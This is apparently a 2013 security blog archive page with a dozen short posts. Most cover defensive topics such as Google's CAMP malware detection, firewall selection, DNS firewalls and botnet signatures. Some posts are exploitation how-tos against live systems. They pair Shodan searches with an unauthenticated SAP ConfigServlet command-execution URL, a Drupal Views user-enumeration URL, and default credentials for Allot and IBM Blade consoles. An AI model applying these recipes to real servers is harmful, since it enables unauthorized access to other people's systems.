Tuesday, April 30, 2013

Last week, Dmitry Chastuchin, Principal Researcher ERPScan published vulnerabilities on SAP.

SAP is the most popular business application. More than 180000 customers worldwide have it.

Companies like Nike, Coca-Cola, Sony working... with SAP systems

In this post, we are going to talk about how we can exploit this weaknesses.

First of all, we need to locate possibles SAP vulnerables servers. As usual, we are going to use Shodan.

http://www.shodanhq.com/search?q=%2Firj%2Fportal+50000



Then, we are going to execute commands on the SAP server through our web browser using the nexts URL queries without authentication.
http://xxxx.xxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=tasklist

We can see the running processes on the server


Posted on Tuesday, April 30, 2013 by Javier Nieto

No comments

Thursday, April 18, 2013

Modern Malware is one of the new background businesses. Every day thousands of users’ machines are infected via so-called drive-by downloads or social engineering techniques. The simple act of visiting a website with a vulnerable browser may be enough for an attacker to gain control over the vulnerable computer allowing her to install arbitrary code.

CAMP was presented in February 2013 at the Network and Distributed System Security Symposium and was explained in a research paper

"CAMP consists of a client component built into Google Chrome and a server component responsible for maintaining a reputation system that predicts the likelihood that a downloaded binary is malicious"

After six-month deployment with more than 200 million Google Chrome users and approximately five million intentional malware downloads per month detected, Google Researchers say that they have developed an Antivirus able to detect the 99% of all malicious downloads in less than 130 ms on average using a reputation-based detection .


The current Security Systems Weakness

The document says the major Antivirus engines detect only 35% to 70% of modern malware. Antivirus are signature-based detection to identify variants of a known malware. Because of this, they cannot protect againts sophisticated techniques like packing, polymorphism and unknown malware. Additionally, some Antivirus has created a CloudAV. CloudAV upload the binaries files to a third-party cloud which implies loss privacy for the users.

Blacklist from Google’s Safe Browsing API , McAfee’s Site Advisor or Symantec’s Safe Web are useful when the compromised or malware distribution websites tend to be a long live but they are unuseful when the malware distribution frequently changing the domain.

Whitelist can be effective in an enterprise environment but they are very restrictive.


CAMP, a different approach

CAMP protects users from malware binaries without requiring (a-priori) knowledge of the binary augmenting whitelists and blacklists with a content-agnostic reputation system.

CAMP is composed of two parts: client (Google Chrome Web Browser) and Google Servers where client connect to download blacklist, whitelist and sends a request to CAMP's reputation service.

How the client works
  1. The browser tries to determine if a download came from a malicious site by checking the download URL against a list of URLs known as "malware distribution" using Google's SafeBrowsing API.
  2. The browser checks locally against a dynamically updated list of trusted domains and trusted binary signers to determine if the downloads are benign.
  3. The browser extracts content-agnostic features from the download and sends a request to CAMP's reputation service for downloads that don't match any of the local lists. 
  4. If a malicious download is requested and detected, Google Chrome warning the users giving her two options: Block or Pass the download.
The features sends to Google CAMP Server will be:
  • The URL and IP of the server hosting the download.
  • Any referrer URL and IP encountered when starting the download.
  • The size of the download and her hash.
  • The signature attached to the download including the signer and any certificate chain leading to it.
  • The browser will never send the binary itself reducing the privacy impact.

Posted on Thursday, April 18, 2013 by Javier Nieto

2 comments

Monday, April 15, 2013

Do you think that the personal from the IT department have default password in their equipments of a production environment? The answer is... YES!!!

In this post, we are going to discover these equipments with default credentials using ẃww.shodanhq.com

Shdoan is like "Google for Hackers". If you don't know; "SHODAN is a search engine that lets you find specific computers (routers, servers, etc.) using a variety of filters. Some have also described it as a public port scan directory or a search engine of banners." 

Shodan is different than Google, Bing... Shodan indexes banners, so we can locate specific version of a specific software. For example, we can search servers running Apache 2.2.3 or a specific ProFTP server version with a known vulnerability.

These are popular Shodan searches examples.

Allot

Allot is a Bandwidth management solution.

http://www.shodanhq.com/search?q=jboss+6657&page=2

Default credentials
Admin: admin
Password: allot
 






Posted on Monday, April 15, 2013 by Javier Nieto

No comments

Thursday, April 11, 2013

In this post, we'll try to identify what are the main features need to be analyzed before buying an Enterprise Network.

Very often I hear some things like... "What's the best firewall in the market?" What Firewall should I buy for my Company?" 

The answer is: "Depend on what type of network you need to protect"

It's not the same a network with 100 users than other critical and redundant network with 50,000 users and 300 servers...



In my opinion these are the essential question you need to thinking about.

Features

  • How many maximum firewall concurrent sessions are need it?
  • How many firewall new sessions per second do you have in your network?
  • How many firewall throughput do you need?
  • How many VPN tunnels and VPN Troughput do you need?
  • What VPN protocols do you want to use (IPSec, L2TP, PPTP)
  • Do you require high availability (load balancing, failover)?
  • Do you need cobber, fiber, 10-100-1000-10000 Mbps interfaces?
  • Are you currently using IPv6 o it will be implemented in the future?
  • How many concurrent session and throughput will you need in the future?

Be careful when calculating the throughput. Throughput is the average rate of successful message delivery over all your network interfaces, not only on the Internet connections.
Commonly, throughput is calculated by the manufacturers in a Lab with a certain packet sizes and not in a real World

Today, Firewalls has extra features to keep in mind.
  • Control Application
  • Antivirus
  • IDS/IPS
  • AntiSpam
  • URL Filtering
  • SSL decryption
  • Date Loss Prevention
  • DHCP
  • Bandwidth Management
  • Wan Optimization
  • Web Cache
  • Proxy
  • ...

Posted on Thursday, April 11, 2013 by Javier Nieto

7 comments

Tuesday, April 09, 2013

Every day Security Engineers are working trying to find infected devices in their networks... But we don't only want to detect an infected devices, also, we want to avoid callbacks connections with a Command and Control Servers (C&C). It's totally necessary to stop this connections in order to these compromised devices don't receive the instructions from Botnet Networks.

How can we do that?

In the Advanced Persisten Threat (APT) Malware war, there are some manufacturers that are creating a new systems for fighting against APT. Today, we are going to talk about DNS Firewalls from Infoblox.

Who are Infoblox?

Infoblox is the DNS, DHCP and IPAM (DDI) market leader. These Infoblox appliances are based on Bind DNS.

"Infoblox delivers essential technology to help customers control their networks. Their patented Grid™ technology helps businesses automate complex network control functions to reduce costs and increase security and uptime. Infoblox solutions help over 6,300 enterprises and service providers in 25 countries make their networks more available, secure and automated."

The idea

Since network firewalls blacklist at the IP address level, malware change their IP addresses hourly using techniques such as “Fast flux”.

Also, since web filter work on the exact URL only, changing URLs flexibly within a domain, malware circumvents web filter.

The idea of Infoblox is to stop/redirect the callbacks connections when a infected computer do a DNS request of a known C&C Server domain.



Posted on Tuesday, April 09, 2013 by Javier Nieto

2 comments

Friday, April 05, 2013

How many times we need to find all the client's web servers on the same IP? Since System Administrators began using "virtual hosts" by domain name with Apache or other web servers, it has become so complicated to find out wich virtual host are hosted on a single IP.

In this cases, how can we figure out all domains on a given IP?

First of all, we need get the IP adreess of a webserver.

We can use nslookup to ge it.

hacking@behindthefirewalls.blogspot.com:~$ nslookup www.newyorktimes.com 8.8.8.8

Server:     8.8.8.8
Address:    8.8.8.8#53

Non-authoritative answer:
www.newyorktimes.com    canonical name = www.nytimes.com.
Name:    www.nytimes.com
Address: 170.149.172.130



Then, we can use the next alternatives.

ip.robtex.com



Posted on Friday, April 05, 2013 by Javier Nieto

2 comments

Thursday, April 04, 2013

Maybe everyone knows this attack because it was discovered in August 2011. I think it's very interesting because each day there are more and more IPS/IDS alerts.

If we take a look at zone-h.org website, we can see the guys like Hmei7 are hacking Joomla's websites with a JCE Editor Vulnerability every day, every minute...


It's possible that one day, when you go to your Joomla Website, you will see something like this:



How can we take advantage of the JCE Editor Weakness?

Posted on Thursday, April 04, 2013 by Javier Nieto

10 comments

Wednesday, April 03, 2013

The last week of March, SANS Institute published "Beating the IPS". This report shows us different IPS evasion techniques manipulating the payload, header, and traffic flow of a well-known attack.

The target is evading detection by widely used products from major security vendors like Cisco, Check Point, Fortinet, Paloalto, TippingPoint and Snort trying to take advantage of MS08-067(http://technet.microsoft.com/en-us/security/bulletin/ms08-067), used by Conficker some years ago...




You can download the report by clicking on this link: http://www.sans.org/reading_room/whitepapers/intrusion/beating-ips_34137

The report's conclusion indicates the efficiency against the automatic attack, however, when we have a custom attack, the situation changes...

All vendors were bypassed using the default IPS settings except one: Checkpoint

The Sans's report recommends blocking Null sessions if we do not need them, and keep an eye on your IPS alerts.

Posted on Wednesday, April 03, 2013 by Javier Nieto

No comments

Tuesday, April 02, 2013

Some months ago, Fortinet published a new list of Botnets Applications supported.

Frequently, more and more infected hosts are including in Botnets Networks. Fortinet has developed a new application's signatures in order to trying to avoid that the infected PCs (called Zombies) contact with the Command & Control Server.

Today, this is the known botnet list by Fortigate:

Agobot.Phatbot, Asprox, BlackEnergy, Bredolab, CMultiLoader, Chapro, Citadel, Cridex, DHL, Danmec.Asprox, Darkness, Dexter, DirtJumper , DistTrack, Duqu, ET, Eleonore.Web.Exploit, FakeSkype, Festi, Flame, Gbot, Gootkit, Gozi, Gumblar, Hiloti, IRC, Illusion, Imrabot, Jeefosance , Katusha, Koobface, LOIC, LOIC.IRC, Lethic , LoL, MacOS.Flashback, MachBot, Mariposa, MoneyBack, Morto, Murofet.CC, Night.Dragon, Pbbot, Phatbot , Pushdo, Qakbot, Ramnit, SDBot , SSHDkit Botnet, Sasfis, Sisron, Smoke, SpyEye, Storm.Krackin, Storm.Worm, T3C4I3, Tedroo, Torpig.Mebroot, Ursnif, VBCF, VertexNet, Vilsel, Virut, Vundo, Waledac, Webwail.Audio.Captcha, Yahoo.Messenger.Worm, Zeroaccess, Zeus

How can we avoid that with Fortigate Firewalls?

First of all, you need to create an Application Sensor in UTM Profiles. We named the Sensor "Botnet":



Posted on Tuesday, April 02, 2013 by Javier Nieto

No comments

In this post we are going to describe how to take advantage of Drupal Views Module Information Disclosure Vulnerability.

As everybody knows, Drupal "is a free and open-source content management framework (CMF) written in PHP and distributed under the GNU General Public License. It is used as a back-end system for at least 2.1% of all websites worldwide ranging from personal blogs to corporate, political, and government sites... It is also used for knowledge management and business collaboration."

First of all, we need to detect some Drupal Installation. We are going to use Shodan. You can use the next query:

After you've selected one of them, we are going to look for all users in the website. You can check the next query:
http://URL/?q=admin/views/ajax/autocomplete/user/e 

In this case, you can see all users that containing "e" in the username.


Posted on Tuesday, April 02, 2013 by Javier Nieto

5 comments

This is a common question that people ask me... Well, I can say that your browser will never be secure because always can exist a 0-day exploit that could gain access to your operating system across your browser...

Everyday, people ask me...

 - "Recently, I've not installed anything but my PC was infected!!! What can I do?"

- "Well, I don't know...  Are your browser and your plugins updated at the last version?"

- "I don't know... How can I check it?"

I found out a website where you can test if your browser's plugins are updated for free. Only go to http://browserscan.rapid7.com/scanme

You will see something like that:


Posted on Tuesday, April 02, 2013 by Javier Nieto

No comments

Several organizations spending a lot of money buying IBM Blades in order to virtualizating their infrastructure reducing costs. But... Why do some organizations not protect their management consoles? Why do some organizations have not inbound tcp port 80 closed in their firewalls?

Well, we are going to take advantage of this...

First of all, we need to locate the IBM Blades Management console. For this, we are going to use Shodan. We need to search next query:

http://www.shodanhq.com/search?q=%2Fprivate%2Fmain.php




Now, we need to check one by one the default credentials.

The credentials are:
  • Username: USERID
  • Password: PASSW0RD (with 0 no O)


Posted on Tuesday, April 02, 2013 by Javier Nieto

No comments